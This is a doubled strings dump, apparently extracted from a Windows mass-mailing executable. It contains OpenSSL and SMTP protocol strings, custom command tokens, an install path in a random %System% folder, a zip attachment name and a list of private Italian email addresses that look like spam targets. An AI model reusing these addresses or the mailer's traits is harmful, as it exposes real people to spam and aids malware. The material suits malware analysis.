d.other
EC_PRIVATEKEY
EC_PRIVATEKEY
publicKey
publicKey
privateKey
privateKey
value.implicitlyCA
value.implicitlyCA
value.parameters
value.parameters
value.named_curve
value.named_curve
p.char_two
p.char_two
p.prime
p.prime
p.ppBasis
p.ppBasis
p.tpBasis
p.tpBasis
p.onBasis
p.onBasis
p.other
p.other
PKCS8_PRIV_KEY_INFO
PKCS8_PRIV_KEY_INFO
pkey
pkey
pkeyalg
pkeyalg
NETSCAPE_CERT_SEQUENCE
NETSCAPE_CERT_SEQUENCE
d.usernotice
d.usernotice
d.cpsuri
d.cpsuri
CERTIFICATEPOLICIES
CERTIFICATEPOLICIES
%*sExplicit Text: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sNumber%s:
%*sOrganization: %s
%*sOrganization: %s
%*sCPS: %s
%*sCPS: %s
%d.%d.%d.%d
%d.%d.%d.%d
/usr/local/ssl/certs
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_DIR
SSL_CERT_FILE
SSL_CERT_FILE
IP Address:%d.%d.%d.%d
IP Address:%d.%d.%d.%d
URI:%s
URI:%s
DNS:%s
DNS:%s
email:%s
email:%s
EdiPartyName:
EdiPartyName:
X400Name:
X400Name:
othername:
othername:
USER32.DLL
USER32.DLL
NETAPI32.DLL
NETAPI32.DLL
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
.\crypto\evp\evp_key.c
.\crypto\evp\evp_key.c
nkey
nkey
%'%1$=%C%K%O%s%
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
C%C'C3C7C9COCWCiC
d:\libraries\openssl-0.9.8l\crypto\ec\ec2_smpt.c
d:\libraries\openssl-0.9.8l\crypto\ec\ec2_smpt.c
%d.%d.%d.%d/%d.%d.%d.%d
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*s%s:
%*sPolicy Text: %s
%*sPolicy Text: %s
%*scrlUrl:
%*scrlUrl:
EXTENDED_KEY_USAGE
EXTENDED_KEY_USAGE
%*sZone: %s, User:
%*sZone: %s, User:
certificateHold
certificateHold
Certificate Hold
Certificate Hold
cessationOfOperation
cessationOfOperation
Cessation Of Operation
Cessation Of Operation
keyCompromise
keyCompromise
Key Compromise
Key Compromise
name.relativename
name.relativename
name.fullname
name.fullname
.\crypto\x509v3\v3_akey.c
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
PKEY_USAGE_PERIOD
keyCertSign
keyCertSign
Certificate Sign
Certificate Sign
keyAgreement
keyAgreement
Key Agreement
Key Agreement
keyEncipherment
keyEncipherment
Key Encipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_skey.c
.\crypto\asn1\x_pkey.c
.\crypto\asn1\x_pkey.c
\X
\X
CONF part of OpenSSL 0.9.8l 5 Nov 2009
CONF part of OpenSSL 0.9.8l 5 Nov 2009
%s - d:d:d %d%s
%s - d:d:d %d%s
- %-15s
- %-15s
'() ,-./:=?
'() ,-./:=?
error:lX:%s:%s:%s
error:lX:%s:%s:%s
%lu:%s:%s:%d:%s
%lu:%s:%s:%d:%s
Verifying - %s
Verifying - %s
CONF_def part of OpenSSL 0.9.8l 5 Nov 2009
CONF_def part of OpenSSL 0.9.8l 5 Nov 2009
[[%s]]
[[%s]]
[%s] %s=%s
[%s] %s=%s
%s.dll
%s.dll
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Operation not permitted
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
MAIL FROM:
MAIL FROM:
RCPT TO:
RCPT TO:
--%s--
--%s--
LOGIN
LOGIN
AUTH LOGIN
AUTH LOGIN
%s^%s^%s
%s^%s^%s
AUTH PLAIN %s
AUTH PLAIN %s
smtp/
smtp/
charset=utf-8,username="%s"
charset=utf-8,username="%s"
,realm="%s"
,realm="%s"
,nonce="%s"
,nonce="%s"
,nc=%s
,nc=%s
,cnonce="%s"
,cnonce="%s"
,digest-uri="%s"
,digest-uri="%s"
,response=%s
,response=%s
,qop=%s
,qop=%s
----=_NextPart_000_000%d_%X.%X
----=_NextPart_000_000%d_%X.%X
Date: %s, %d %s %d %d:%d:%d
Date: %s, %d %s %d %d:%d:%d
EHLO %s
EHLO %s
PHACMD_ABORT_
PHACMD_ABORT_
undefined.zip
undefined.zip
PHACMD_SKIP__ERROR
PHACMD_SKIP__ERROR
PHACMD_MESSAGE_SENT
PHACMD_MESSAGE_SENT
PHACMD_ACCOUNT_STRING
PHACMD_ACCOUNT_STRING
INVALID_SMTP
INVALID_SMTP
PHACMD_PACKAGE_STRING
PHACMD_PACKAGE_STRING
PHACMD_FROM_NAME
PHACMD_FROM_NAME
Z:\@proj\smtp_mailer\Release\smtp_mailer.pdb
Z:\@proj\smtp_mailer\Release\smtp_mailer.pdb
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
USER32.dll
USER32.dll
ReportEventA
ReportEventA
ADVAPI32.dll
ADVAPI32.dll
PeekNamedPipe
PeekNamedPipe
zcÃ
zcÃ
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.?AVCSmtp@@
.?AVCSmtp@@
.?AVECSmtp@@
.?AVECSmtp@@
%System%\nkpkpudssleie\smtp\smtp_mailer.exe
%System%\nkpkpudssleie\smtp\smtp_mailer.exe
Inappropriate I/O control opera
Inappropriate I/O control opera
marini.m2@libero.it
marini.m2@libero.it
%System%\nkpkpudssleie\smtp\tmp\sbgtca.txt
%System%\nkpkpudssleie\smtp\tmp\sbgtca.txt
%System%\nkpkpudssleie\smtp\tmp\24andrewson.zip
%System%\nkpkpudssleie\smtp\tmp\24andrewson.zip
mario.gilardi@infap.it,mario.lapini@turishav.it,mario.tintori@universalturismo.com,mario@gardareisen.it,mariobochicchio@virgilio.it,mariocrivaroonlus@virgilio.it,mariocrocetti@libero.it,mariodesideri@icloud.com,marionurossi@libero.it
mario.gilardi@infap.it,mario.lapini@turishav.it,mario.tintori@universalturismo.com,mario@gardareisen.it,mariobochicchio@virgilio.it,mariocrivaroonlus@virgilio.it,mariocrocetti@libero.it,mariodesideri@icloud.com,marionurossi@libero.it
pratesi.com
pratesi.com
s.com
s.com
6 6$6(6,60646~7
6 6$6(6,60646~7
3 3$3(3,3034383
3 3$3(3,3034383
;&;,;
;&;,;
9(:-:4:::
9(:-:4:::
7t7U7\7
7t7U7\7
4E4F4`4r4
4E4F4`4r4
> >(>0>8>
> >(>0>8>
6$6(6\6`6
6$6(6\6`6
; ;$;0;4;8;|;
; ;$;0;4;8;|;
3 3@3`3|3
3 3@3`3|3
Fmscoree.dll
Fmscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
portuguese-brazilian
portuguese-brazilian